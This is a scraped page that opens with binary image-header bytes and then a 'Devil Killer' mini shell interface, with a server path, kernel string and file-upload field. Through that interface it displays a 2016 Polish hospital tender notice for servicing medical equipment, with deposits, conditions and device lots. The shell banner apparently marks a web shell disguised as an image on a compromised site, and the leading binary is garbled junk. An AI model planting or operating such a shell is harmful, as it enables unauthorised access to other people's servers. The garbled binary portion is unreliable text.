JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160325/69198-N-2016.html

<p class="kh_header"><b>Jelenia Góra: Wykonanie usługi przeglądów serwisowych urządzeń medycznych z podziałem na 52 zadania dla potrzeb Wojewódzkiego Centrum Szpitalnego  Kotliny Jeleniogórskiej</b><br>
<b>Numer ogłoszenia: 69198 - 2016; data zamieszczenia: 25.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzkie Centrum Szpitalne Kotliny Jeleniogórskiej , ul. Ogińskiego 6, 58-506 Jelenia Góra, woj. dolnośląskie, tel. 75 7537286, faks 75 7543883.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.jgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi przeglądów serwisowych urządzeń medycznych z podziałem na 52 zadania dla potrzeb Wojewódzkiego Centrum Szpitalnego  Kotliny Jeleniogórskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie usługi przeglądów serwisowych urządzeń medycznych z podziałem na 52 zadania dla potrzeb Wojewódzkiego Centrum Szpitalnego  Kotliny Jeleniogórskiej.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 52.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta ma być zabezpieczona wadium. Zamawiający żąda wniesienia wadium w wysokości  :
Zadanie nr 1 :    24,00 zł.
Zadanie nr 2 :    36,00 zł.
Zadanie nr 3 :    54,00 zł.
Zadanie nr 4 :   233,00 zł.
Zadanie nr 5 :     54,00 zł.
Zadanie nr 6 :   210,00 zł.
Zadanie nr 7 :   570,00 zł.
Zadanie nr 8 :     87,00 zł.
Zadanie nr 9 :     30,00 zł.
Zadanie nr 10 : 150,00 zł.
Zadanie nr 11 : 150,00 zł.
Zadanie nr 12 :   30,00 zł.
Zadanie nr 13 : 150,00 zł.
Zadanie nr 14 :     6,00 zł.
Zadanie nr 15 : 570,00 zł.
Zadanie nr 16 :   30,00 zł.
Zadanie nr 17 :   75,00 zł.
Zadanie nr 18 : 180,00 zł.
Zadanie nr 19 :     8,00 zł.
Zadanie nr 20 : 270,00 zł.
Zadanie nr 21 : 150,00 zł.
Zadanie nr 22 : 150,00 zł.
Zadanie nr 23 : 1 140,00 zł.
Zadanie nr 24 : 600,00 zł.
Zadanie nr 25 :   15,00 zł.
Zadanie nr 26 : 235,00 zł.
Zadanie nr 27 :   30,00 zł.
Zadanie nr 28 : 300,00 zł.
Zadanie nr 29 : 120,00 zł.
Zadanie nr 30 :   75,00 zł.
Zadanie nr 31 :   30,00 zł.
Zadanie nr 32 : 180,00 zł.
Zadanie nr 33 : 2 190,00 zł.
Zadanie nr 34 :   75,00 zł.
Zadanie nr 35 : 180,00 zł.
Zadanie nr 36 :   15,00 zł.
Zadanie nr 37 : 120,00 zł.
Zadanie nr 38 : 225,00 zł.
Zadanie nr 39 :   75,00 zł.
Zadanie nr 40 :   75,00 zł.
Zadanie nr 41 : 300,00 zł.
Zadanie nr 42 : 450,00 zł.
Zadanie nr 43 :   75,00 zł.
Zadanie nr 44 :   30,00 zł.
Zadanie nr 45 : 375,00 zł.
Zadanie nr 46 :   68,00 zł.
Zadanie nr 47 :   45,00 zł.
Zadanie nr 48 :   36,00 zł.
Zadanie nr 49 :   75,00 zł.
Zadanie nr 50 :   90,00 zł.
Zadanie nr 51 :   30,00 zł.
Zadanie nr 52 :   30,00 zł.

a) wadium ma być wniesione: do dnia  5 kwietnia  2016  r. do godziny  10.00 .
w poniższych formach :
- w pieniądzu PLN  ( na konto : PKO BANK  POLSKI Spółka Akcyjna, nr rachunku : na konto : 23 1020 2137 0000 9702 0129 1483 )
- w poręczeniach  bankowych
- w gwarancjach bankowych 
- gwarancjach ubezpieczeniowych
-  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. 2007  Nr  42, poz. 275 z  2008 roku Nr 116, poz.732 i Nr 227 , poz. 1505 oraz z 2010 roku Nr 96, poz. 620  z poźn. zm.).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania tego warunku na podstawie treści złożonego oświadczenia według formuły spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania tego warunku na podstawie treści złożonego oświadczenia według formuły spełnia / nie spełnia oraz  jeżeli wykonawca wykaże , że w okresie ostatnich trzech  lat przed upływem terminu składania ofert albo wniosków  o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , wykonał należycie co najmniej dwie usługi  zgodne      z przedmiotem zamówienia o wartości min. 50.000,00 zł brutto każda ( na podst.  załączonych dowodów  potwierdzających ,  że zostały wykonane lub są wykonywane należycie).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania tego warunku na podstawie treści złożonego oświadczenia według formuły spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w oparciu o złożone przez Wykonawcę stosowne oświadczenie i dokumenty , jeżeli wykonawca wykaże, iż posiada  polisę OC min. na 150.000,00 zł  w zakresie prowadzonej działalności,  a w  przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od  odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę  min. 150.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta ma zawierać :
12.1. wypełniony druk oferty -  na podstawie załącznika nr 3  ,
12.2. szczegółową ofertę cenową ( zgodnie  z wykazem asortymentowo- ilościowym - załącznik nr 7 ).
12.3. oferowany   terminu rozpatrzenia reklamacji  przedmiotu zamówienia ( min 1 
        dzień, max. 7  dni )  - należy wpisać  - załącznik nr 2 ; - termin rozpatrzenia          reklamacji jest jednocześnie drugim kryterium oceny ofert.
12.4. określenie terminu realizacji przedmiotu zamówienia - załącznik nr 2 ;
12.5. szczegółowe informacje na temat gwarancji (min. termin został określony                w pkt.  4 SIWZ) -  należy wpisać do formularza oferty załącznik nr 2 ;        
12.6. aktualny odpis z właściwego rejestru , jeżeli odrębne przepisy wymagają wpisu do rejestru , w celu wskazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. Ustawy Pzp  wystawionego nie wcześniej niż 6 miesięcy przez upływem terminu składania ofert  w ( celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej  działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, ) ;
12.7. oświadczenie, że materiały użyte do wykonania  zadania  będą spełniać wymogi zawarte w SIWZ oraz posiadać będą wymagane prawem                     w publicznych placówkach służby zdrowia deklaracje i atesty - załącznik nr 2
12.8. oświadczenie art. 22 ust. 1 ustawy  - zgodnie z załącznikiem nr 3 ; 
12.9.oświadczenie , że Wykonawca  nie podlega wykluczeniu z postępowania na podstawie art. 24 ust.1 i 2  ustawy  z dnia 29 stycznia 2004 r. Prawo Zamówień  Publicznych ze zm. (zgodnie  z załączonym formularzem , załącznik nr 4 ),  
12.10. potwierdzenie wniesienia wadium; 
12.11.wykaz wykonawców przynależnych do tej samej grupy kapitałowej lub oświadczenie o braku przynależności do grupy kapitałowej, zawarte w formularzu oferty ( załącznik nr 2 )  
12.12. wykaz wykonywanych a w przypadku świadczeń okresowych lub ciągłych   
         również wykonanych głównych dostaw lub usług  , w okresie ostatnich trzech  lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do 
          udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy -   
 w tym okresie, wraz z podaniem ich wartości, przedmiotu , dat wykonania            i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie
- warunek zostanie spełniony , jeżeli wykonawca wykaże , że w okresie ostatnich trzech  lat przed upływem terminu składania ofert albo wniosków  o dopuszczenie do udziału   w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , wykonał należycie co najmniej  trzy  usługi zgodne z przedmiotem zamówienia  o wartości min. 50.000,00 zł brutto każda wraz załączeniem dowodów  potwierdzających ,  że zostały wykonane lub są wykonywane należycie  - ( wg. zał. nr 6.).
12.13.polisę OC: min. na 150.000,00 zł  w zakresie prowadzonej działalności,  a w  przypadku   jej braku inny dokument potwierdzający, że  Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę  min.  150.000,00 zł.
- Zamawiający uzna warunek za spełniony w oparciu o złożone przez Wykonawcę stosowne oświadczenie i dokumenty , jeżeli wykonawca wykaże, iż posiada  polisę OC min. na 150.000,00 zł  w zakresie prowadzonej działalności, a w  przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od  odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę  min. 150.000,00 zł.
12.14.  oświadczenie, że Wykonawca posiada uprawnienia, kwalifikacje oraz doświadczenie, a także dysponuje sprzętem i wykwalifikowanym personelem niezbędnym do wykonywania wszelkich świadczeń wynikających z postanowień niniejszej umowy w sposób całkowicie z nią zgodny i zobowiązuje się do utrzymania takiego stanu rzeczy przez cały okres obowiązywania niniejszej umowy,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin rozpatrzenia reklamacji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz,jgora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W.C.S .K.J w Jeleniej Górze, 58-506, ul. Ogińskiego 6, Dział Zamówień Publicznych i Zaopatrzenia (pok. 024) -bud. D-niski parter. Forma papierowa do pobrania za odpłatnością 25,00 zł brutto..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.04.2016 godzina 10:00, miejsce: Wojewódzkie Centrum Szpitalne Kotliny Jeleniogórskiej w Jeleniej Górze ( kod. poczt. 58-506) , ul. Ogińskiego 6 , sekretariat Szpitala (pok. 171) , bud. D - parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1
1. RESPIRATOR ELISEE 350 OaiIT snEL2H0912012
2. RESPIRATOR ELISEE 250 OaiIT sn EL2U0909033.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2
1. DEFIBRYLATOR  ZDO CARDIO-AID MC+ sn1200154
2. DEFIBRYLATOR KARDIOLOGIA CARDIO-AID MC+ sn1200152.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3
RESPIRATOR SECHRIST IV-200B  SN 22663  ODDZ. NEONATOLOGII.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4
1. RESPIRATOR MONAL T75  OaiIT sn MT75/00312
2. RESPIRATOR MONAL T75  OaiIT snMT75/00318
3. RESPIRATOR MONAL T75  OaiIT sn MT75/00313
4. RESPIRATOR MONAL T 50 ODDZ. NEUROLOGICZNY sn MT50-01297
5. RESPIRATOR MONAL T 50 ODDZ. NEUROLOGICZNY sn MT50-01304
6. STANOWISKO DO ZNIECZULEŃ LEON PLUS  SN 020001HUL00404398  BLOK OPERACYJNY
7. APARAT DO ZNIECZULEŃ  LEON PLUS  SN 020001HUL00404399  BLOK OPERACYJNY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5
1. STATIM 5000 52016J5601 BLOK OPERACYJNY
2. STATIM 500 501/506 BLOK OPERACYJNY
3. STATIM 5000 52016J5601 BLOK OPERACYJNY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 6
1. RESPIRATOR BENNETT  NPB 840 OaiIT  sn3510064093
2. RESPIRATOR BENNETT  NPB 840 OaiIT  sn3510064134
3. RESPIRATOR BENNETT 7200A OaiIT  sn9040988
4. RESPIRATOR BENNETT  7200A OaiIT  sn8941138
5. RESPIRATOR BENNETT  NPB 760 SOR  sn3501080215
6. RESPIRATOR NPB 840  2013 Oddział chorób płuc Kowary SN3512123376.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 7
1. MYJNIA  AUTOMATYCZNA ETD-3 BASIS sn 09130914 PRACOWNIA BRONCHOSKOPII
2. MYJNIA  AUTOMATYCZNA ETD-2 PLUS sn 6802 PRACOWNIA ENDOSKOPII
3. MYJNIA  AUTOMATYCZNA ETD-2 PLUS sn 7125 PRACOWNIA ENDOSKOPII
4. MYJNIA  AUTOMATYCZNA ETD-2 PLUS  sn 7004 PRACOWNIA BRONCHOSKOPII  KOWARY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
